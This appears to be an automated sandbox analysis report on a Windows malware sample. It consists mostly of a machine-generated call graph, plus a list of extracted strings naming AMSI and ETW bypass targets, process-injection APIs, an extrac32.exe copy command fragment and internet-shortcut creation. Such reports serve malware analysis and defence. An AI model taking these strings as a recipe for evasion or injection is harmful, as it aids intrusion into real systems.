27082 28c78c2 27079->27082 27083 28b7be8 14 API calls 27080->27083 27084 28b7be8 14 API calls 27081->27084 27085 28b7be8 14 API calls 27082->27085 27087 28c713f 27083->27087 27089 28c7416 27084->27089 27100 28c78f5 27085->27100 27093 28b7be8 14 API calls 27086->27093 27090 28bc74c 8 API calls 27087->27090 27096 28b7be8 14 API calls 27088->27096 27091 28a4824 8 API calls 27089->27091 27095 28c7154 27090->27095 27115 28c7437 27091->27115 27101 28b7be8 14 API calls 27092->27101 27097 28c5e78 27093->27097 27103 28b7be8 14 API calls 27094->27103 27098 28a44f4 8 API calls 27095->27098 27099 28c69a1 27096->27099 27102 28a4824 8 API calls 27097->27102 27104 28c7164 27098->27104 27106 28a49bc 8 API calls 27099->27106 27105 28b7be8 14 API calls 27100->27105 27107 28c46eb 27101->27107 27120 28c5e99 27102->27120 27108 28c4949 27103->27108 27109 28a4824 8 API calls 27104->27109 27113 28c7928 27105->27113 27111 28c69c5 27106->27111 27112 28a4824 8 API calls 27107->27112 27110 28a4824 8 API calls 27108->27110 27122 28c7185 27109->27122 27126 28c496a 27110->27126 27114 28a4824 8 API calls 27111->27114 27124 28c470c 27112->27124 27116 28b7be8 14 API calls 27113->27116 27138 28c69f4 27114->27138 27118 28b7be8 14 API calls 27115->27118 27117 28c795b 27116->27117 27119 28a4824 8 API calls 27117->27119 27121 28c7492 27118->27121 27143 28c797c 27119->27143 27125 28b7be8 14 API calls 27120->27125 27123 28a49bc 8 API calls 27121->27123 27129 28b7be8 14 API calls 27122->27129 27127 28c749c 27123->27127 27131 28b7be8 14 API calls 27124->27131 27128 28c5ef4 27125->27128 27133 28b7be8 14 API calls 27126->27133 27130 28b7f48 30 API calls 27127->27130 27132 28a4824 8 API calls 27128->27132 27134 28c71e0 27129->27134 27130->26880 27135 28c4767 27131->27135 27149 28c5f15 27132->27149 27136 28c49c5 27133->27136 27137 28a4824 8 API calls 27134->27137 27139 28a4824 8 API calls 27135->27139 27140 28a4824 8 API calls 27136->27140 27150 28c7201 27137->27150 27141 28b7be8 14 API calls 27138->27141 27147 28c4788 27139->27147 27153 28c49e6 27140->27153 27142 28c6a4f 27141->27142 27144 28a4824 8 API calls 27142->27144 27145 28b7be8 14 API calls 27143->27145 27160 28c6a70 27144->27160 27146 28c79d7 27145->27146 27148 28a4824 8 API calls 27146->27148 27151 28bc3f8 13 API calls 27147->27151 27164 28c79f8 27148->27164 27152 28b7be8 14 API calls 27149->27152 27155 28b7be8 14 API calls 27150->27155 27151->27016 27154 28c5f70 27152->27154 27157 28b7be8 14 API calls 27153->27157 27156 28ba1c0 45 API calls 27154->27156 27166 28c725c 27155->27166 27158 28c5f81 27156->27158 27159 28c4a41 27157->27159 27158->25600 27161 28a4824 8 API calls 27159->27161 27162 28b7be8 14 API calls 27160->27162 27170 28c4a62 27161->27170 27163 28c6acb 27162->27163 27165 28a4824 8 API calls 27163->27165 27168 28b7be8 14 API calls 27164->27168 27176 28c6aec 27165->27176 27167 28bc3f8 13 API calls 27166->27167 27167->27005 27169 28c7a53 27168->27169 27171 28b7be8 14 API calls 27169->27171 27172 28b7be8 14 API calls 27170->27172 27173 28c7a86 27171->27173 27174 28c4abd 27172->27174 27175 28a4824 8 API calls 27173->27175 27177 28a4824 8 API calls 27174->27177 27180 28c7aa7 27175->27180 27178 28b7be8 14 API calls 27176->27178 27181 28c4ade 27177->27181 27179 28c6b47 EnumSystemLocalesA 27178->27179 27179->26826 27182 28b7be8 14 API calls 27180->27182 27183 28b7be8 14 API calls 27181->27183 27184 28c7b02 27182->27184 27185 28c4b39 27183->27185 27186 28a4824 8 API calls 27184->27186 27187 28a4824 8 API calls 27185->27187 27188 28c7b23 27186->27188 27190 28c4b79 27187->27190 27189 28b7be8 14 API calls 27188->27189 27191 28c7b7e 27189->27191 27193 28b7be8 14 API calls 27190->27193 27192 28a4824 8 API calls 27191->27192 27196 28c7b9f 27192->27196 27194 28c4bd4 27193->27194 27195 28a4824 8 API calls 27194->27195 27197 28c4c03 27195->27197 27199 28b7be8 14 API calls 27196->27199 27198 28a794c 8 API calls 27197->27198 27200 28c4c2b 27198->27200 27201 28c7bfa 27199->27201 27202 28a4824 8 API calls 27200->27202 27203 28b7be8 14 API calls 27201->27203 27206 28c4c72 27202->27206 27204 28c7c2d 27203->27204 27205 28b7be8 14 API calls 27204->27205 27207 28c7c60 27205->27207 27208 28b7be8 14 API calls 27206->27208 27210 28b7be8 14 API calls 27207->27210 27209 28c4ccd 27208->27209 27211 28a4824 8 API calls 27209->27211 27212 28c7c93 27210->27212 27216 28c4cee 27211->27216 27213 28b7be8 14 API calls 27212->27213 27214 28c7cc6 27213->27214 27215 28a4824 8 API calls 27214->27215 27220 28c7ce7 27215->27220 27217 28b7be8 14 API calls 27216->27217 27218 28c4d49 27217->27218 27219 28a794c 8 API calls 27218->27219 27223 28c4d5f 27219->27223 27221 28b7be8 14 API calls 27220->27221 27222 28c7d42 27221->27222 27224 28a4824 8 API calls 27222->27224 27225 28a4824 8 API calls 27223->27225 27226 28c7d63 27224->27226 27227 28c4da6 27225->27227 27228 28b7be8 14 API calls 27226->27228 27229 28b7be8 14 API calls 27227->27229 27232 28c7dbe 27228->27232 27230 28c4e01 27229->27230 27231 28a4824 8 API calls 27230->27231 27236 28c4e22 27231->27236 27233 28b7be8 14 API calls 27232->27233 27234 28c7df1 27233->27234 27235 28b7be8 14 API calls 27234->27235 27239 28c7e24 27235->27239 27237 28b7be8 14 API calls 27236->27237 27238 28c4e7d 27237->27238 27240 28a4824 8 API calls 27238->27240 27241 28b7be8 14 API calls 27239->27241 27244 28c4eb7 27240->27244 27242 28c7e57 27241->27242 27243 28b7be8 14 API calls 27242->27243 27245 28c7e8a 27243->27245 27244->25600 27246 28b7be8 14 API calls 27245->27246 27247 28c7ebd 27246->27247 27248 28a4824 8 API calls 27247->27248 27249 28c7ede 27248->27249 27250 28b7be8 14 API calls 27249->27250 27251 28c7f39 27250->27251 27252 28a4824 8 API calls 27251->27252 27253 28c7f5a 27252->27253 27254 28b7be8 14 API calls 27253->27254 27255 28c7fb5 27254->27255 27256 28a4824 8 API calls 27255->27256 27257 28c7fd6 27256->27257 27258 28b7be8 14 API calls 27257->27258 27259 28c8031 27258->27259 27260 28a4824 8 API calls 27259->27260 27261 28c8052 27260->27261 27262 28b7be8 14 API calls 27261->27262 27263 28c80ad 27262->27263 27264 28a4824 8 API calls 27263->27264 27265 28c80ce 27264->27265 27266 28b7be8 14 API calls 27265->27266 27267 28c8129 27266->27267 27268 28b7be8 14 API calls 27267->27268 27269 28c8138 27268->27269 27270 28b7be8 14 API calls 27269->27270 27271 28c8147 27270->27271 27272 28b7be8 14 API calls 27271->27272 27273 28c8156 27272->27273 27274 28b7be8 14 API calls 27273->27274 27275 28c8165 27274->27275 27276 28b7be8 14 API calls 27275->27276 27277 28c8174 27276->27277 27278 28b7be8 14 API calls 27277->27278 27279 28c8183 27278->27279 27280 28b7be8 14 API calls 27279->27280 27281 28c8192 27280->27281 27282 28b7be8 14 API calls 27281->27282 27283 28c81a1 27282->27283 27284 28b7be8 14 API calls 27283->27284 27285 28c81b0 27284->27285 27286 28b7be8 14 API calls 27285->27286 27287 28c81bf 27286->27287 27288 28b7be8 14 API calls 27287->27288 27289 28c81ce 27288->27289 27290 28b7be8 14 API calls 27289->27290 27291 28c81dd 27290->27291 27292 28b7be8 14 API calls 27291->27292 27293 28c81ec 27292->27293 27294 28b7be8 14 API calls 27293->27294 27295 28c81fb 27294->27295 27296 28b7be8 14 API calls 27295->27296 27297 28c820a 27296->27297 27298 28a4824 8 API calls 27297->27298 27299 28c822b 27298->27299 27300 28b7be8 14 API calls 27299->27300 27301 28c8286 27300->27301 27302 28a4824 8 API calls 27301->27302 27303 28c82a7 27302->27303 27304 28b7be8 14 API calls 27303->27304 27305 28c8302 27304->27305 27306 28a4824 8 API calls 27305->27306 27307 28c8323 27306->27307 27308 28b7be8 14 API calls 27307->27308 27309 28c837e 27308->27309 27310 28b7be8 14 API calls 27309->27310 27311 28c83b1 27310->27311 27312 28b7be8 14 API calls 27311->27312 27313 28c83e4 27312->27313 27314 28b7be8 14 API calls 27313->27314 27315 28c8417 27314->27315 27316 28b7be8 14 API calls 27315->27316 27317 28c844a 27316->27317 27318 28b7be8 14 API calls 27317->27318 27319 28c847d 27318->27319 27320 28b7be8 14 API calls 27319->27320 27321 28c84b0 27320->27321 27322 28b7be8 14 API calls 27321->27322 27323 28c84e3 27322->27323 27324 28a4824 8 API calls 27323->27324 27325 28c8504 27324->27325 27326 28b7be8 14 API calls 27325->27326 27327 28c855f 27326->27327 27328 28a4824 8 API calls 27327->27328 27329 28c8580 27328->27329 27330 28b7be8 14 API calls 27329->27330 27331 28c85db 27330->27331 27332 28a4824 8 API calls 27331->27332 27333 28c85fc 27332->27333 27334 28b7be8 14 API calls 27333->27334 27335 28c8657 27334->27335 27336 28b7be8 14 API calls 27335->27336 27337 28c868a 27336->27337 27338 28b7be8 14 API calls 27337->27338 27339 28c86bd 27338->27339 27340 28b7be8 14 API calls 27339->27340 27341 28c86f0 27340->27341 27342 28b7be8 14 API calls 27341->27342 27343 28c8723 27342->27343 27344 28b7be8 14 API calls 27343->27344 27345 28c8756 27344->27345 27346 28b7be8 14 API calls 27345->27346 27347 28c8789 27346->27347 27348 28b7be8 14 API calls 27347->27348 27349 28c87bc 27348->27349 27350 28b7be8 14 API calls 27349->27350 27351 28c87ef 27350->27351 27352 28b7be8 14 API calls 27351->27352 27353 28c8822 27352->27353 27354 28b7be8 14 API calls 27353->27354 27355 28c8855 27354->27355 27356 28b7be8 14 API calls 27355->27356 27357 28c8888 27356->27357 27358 28b7be8 14 API calls 27357->27358 27359 28c88bb 27358->27359 27360 28b7be8 14 API calls 27359->27360 27361 28c88ee 27360->27361 27362 28b7be8 14 API calls 27361->27362 27363 28c8921 27362->27363 27364 28b7be8 14 API calls 27363->27364 27365 28c8954 27364->27365 27366 28b7be8 14 API calls 27365->27366 27367 28c8987 27366->27367 27368 28b7be8 14 API calls 27367->27368 27369 28c89ba 27368->27369 27370 28b7be8 14 API calls 27369->27370 27371 28c89ed 27370->27371 27372 28b7be8 14 API calls 27371->27372 27373 28c8a20 27372->27373 27374 28a4824 8 API calls 27373->27374 27375 28c8a41 27374->27375 27376 28b7be8 14 API calls 27375->27376 27377 28c8a9c 27376->27377 27378 28a4824 8 API calls 27377->27378 27379 28c8abd 27378->27379 27380 28b7be8 14 API calls 27379->27380 27381 28c8b18 27380->27381 27382 28a4824 8 API calls 27381->27382 27383 28c8b39 27382->27383 27384 28b7be8 14 API calls 27383->27384 27385 28c8b94 ExitProcess 27384->27385 27387 28a4835 27386->27387 27388 28a485b 27387->27388 27389 28a4872 27387->27389 27401 28a4b90 27388->27401 27407 28a4564 27389->27407 27392 28a48a3 27393 28a4868 27393->27392 27394 28a44f4 8 API calls 27393->27394 27394->27392 27397 28a44f8 27395->27397 27399 28a4508 27395->27399 27396 28a4536 27396->25610 27398 28a4564 8 API calls 27397->27398 27397->27399 27398->27399 27399->27396 27400 28a2c2c 8 API calls 27399->27400 27400->27396 27403 28a4b9d 27401->27403 27406 28a4bcd 27401->27406 27404 28a4ba9 27403->27404 27405 28a4564 8 API calls 27403->27405 27404->27393 27405->27406 27412 28a44a0 27406->27412 27408 28a4568 27407->27408 27409 28a458c 27407->27409 27425 28a2c10 27408->27425 27409->27393 27411 28a4575 27411->27393 27413 28a44c1 27412->27413 27414 28a44a6 27412->27414 27413->27404 27414->27413 27416 28a2c2c 27414->27416 27417 28a2c3a 27416->27417 27418 28a2c30 27416->27418 27417->27413 27418->27417 27419 28a2d19 27418->27419 27423 28a64e4 TlsGetValue 27418->27423 27424 28a2ce8 7 API calls 27419->27424 27422 28a2d3a 27422->27413 27423->27419 27424->27422 27426 28a2c27 27425->27426 27429 28a2c14 27425->27429 27426->27411 27427 28a2c1e 27427->27411 27428 28a2d19 27434 28a2ce8 7 API calls 27428->27434 27429->27427 27429->27428 27433 28a64e4 TlsGetValue 27429->27433 27432 28a2d3a 27432->27411 27433->27428 27434->27432 27435 28a1a8f 27436 28a1b6c 27435->27436 27437 28a1aa1 27435->27437 27438 28a16e8 27436->27438 27439 28a1aa7 27436->27439 27437->27439 27441 28a1b13 Sleep 27437->27441 27440 28a1c66 27438->27440 27452 28a1644 27438->27452 27442 28a1ab0 27439->27442 27445 28a1b4b Sleep 27439->27445 27449 28a1b81 27439->27449 27441->27439 27444 28a1b2d Sleep 27441->27444 27444->27437 27447 28a1b61 Sleep 27445->27447 27445->27449 27447->27439 27448 28a170d 27450 28a1c00 VirtualFree 27449->27450 27451 28a1ba4 27449->27451 27453 28a1681 VirtualFree 27452->27453 27454 28a164d 27452->27454 27453->27448 27454->27453 27455 28a164f Sleep 27454->27455 27456 28a1664 27455->27456 27456->27453 27457 28a1668 Sleep 27456->27457 27457->27454 27458 28ca2f4 27467 28a6530 27458->27467 27462 28ca322 27472 28c9b54 timeSetEvent 27462->27472 27464 28ca33a GetMessageA 27465 28ca34a 27464->27465 27466 28ca32c 27464->27466 27466->27464 27468 28a653b 27467->27468 27473 28a415c 27468->27473 27470 28a6575 27471 28a4270 SysFreeString 27470->27471 27471->27462 27472->27466 27474 28a41a2 27473->27474 27475 28a4220 27474->27475 27485 28a40f4 27474->27485 27475->27470 27477 28a43dd 27475->27477 27480 28a43ee 27475->27480 27490 28a4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 27477->27490 27479 28a43e7 27479->27480 27481 28a4433 FreeLibrary 27480->27481 27482 28a4457 27480->27482 27481->27480 27483 28a4460 27482->27483 27484 28a4466 ExitProcess 27482->27484 27483->27484 27486 28a4104 27485->27486 27487 28a4137 27485->27487 27486->27487 27491 28a582c 27486->27491 27495 28a15cc 27486->27495 27487->27475 27490->27479 27492 28a583c GetModuleFileNameA 27491->27492 27493 28a5858 27491->27493 27499 28a5a90 GetModuleFileNameA RegOpenKeyExA 27492->27499 27493->27486 27518 28a1560 27495->27518 27497 28a15d4 VirtualAlloc 27498 28a15eb 27497->27498 27498->27486 27500 28a5b13 27499->27500 27501 28a5ad3 RegOpenKeyExA 27499->27501 27517 28a58cc 6 API calls 27500->27517 27501->27500 27502 28a5af1 RegOpenKeyExA 27501->27502 27502->27500 27505 28a5b9c lstrcpyn GetThreadLocale GetLocaleInfoA 27502->27505 27504 28a5b38 RegQueryValueExA 27506 28a5b7a RegCloseKey 27504->27506 27507 28a5b58 RegQueryValueExA 27504->27507 27508 28a5bd3 27505->27508 27509 28a5cb6 27505->27509 27506->27493 27507->27506 27510 28a5b76 27507->27510 27508->27509 27511 28a5be3 lstrlen 27508->27511 27509->27493 27510->27506 27512 28a5bfb 27511->27512 27512->27509 27513 28a5c48 27512->27513 27514 28a5c20 lstrcpyn LoadLibraryExA 27512->27514 27513->27509 27515 28a5c52 lstrcpyn LoadLibraryExA 27513->27515 27514->27513 27515->27509 27516 28a5c84 lstrcpyn LoadLibraryExA 27515->27516 27516->27509 27517->27504 27519 28a1500 27518->27519 27519->27497 27520 28a4c60 27521 28a4c24 27520->27521 27523 28a4bf4 27520->27523 27522 28a4c2a SysFreeString 27521->27522 27521->27523 27522->27523 27524 28a1727 27525 28a1968 27524->27525 27533 28a173c 27524->27533 27526 28a1938 27525->27526 27527 28a1a80 27525->27527 27532 28a1947 Sleep 27526->27532 27537 28a1986 27526->27537 27529 28a1a89 27527->27529 27530 28a1684 VirtualAlloc 27527->27530 27528 28a174e 27531 28a175d 27528->27531 27540 28a182c 27528->27540 27542 28a180a Sleep 27528->27542 27534 28a16bf 27530->27534 27535 28a16af 27530->27535 27536 28a195d Sleep 27532->27536 27532->27537 27533->27528 27538 28a17cb Sleep 27533->27538 27539 28a1644 2 API calls 27535->27539 27536->27526 27543 28a15cc VirtualAlloc 27537->27543 27545 28a19a4 27537->27545 27538->27528 27541 28a17e4 Sleep 27538->27541 27539->27534 27546 28a15cc VirtualAlloc 27540->27546 27547 28a1838 27540->27547 27541->27533 27542->27540 27544 28a1820 Sleep 27542->27544 27543->27545 27544->27528 27546->27547

                                                                                                                            Executed Functions

                                                                                                                            Function 028BD5D0 Relevance: 213.4, APIs: 6, Strings: 111, Instructions: 8669COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileModuleNamePath$AddressAttributesCloseHandleLibraryLoadName_Proc
                                                                                                                            • String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                            • API String ID: 323450510-582383607
                                                                                                                            • Opcode ID: 0895e44e53358d3f1d11f969b45405ccc83533e411f5f3f4472308f58c73a7e9
                                                                                                                            • Instruction ID: b66d474959bf17048463ae7e3da3c59e97a8bfb020e029dd130f84abd4835b8c
                                                                                                                            • Opcode Fuzzy Hash: 0895e44e53358d3f1d11f969b45405ccc83533e411f5f3f4472308f58c73a7e9
                                                                                                                            • Instruction Fuzzy Hash: FA040A3DA501588FEF51EB68D890ADDB3B6BF85300F2484E5A109E7714DFB0AE858F52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028C5F9F Relevance: 142.4, APIs: 3, Strings: 77, Instructions: 2446COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 4377 28c5f9f-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4492 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4377->4492 4493 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 4377->4493 4582 28c6cdd-28c6cec call 28a48b0 4492->4582 4583 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 4492->4583 5021 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 4493->5021 5022 28c69b6-28c69b9 4493->5022 4582->4583 4593 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 4582->4593 4834 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 4593->4834 4835 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 4593->4835 4834->4835 4835->4583 5021->4492 5022->5021
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
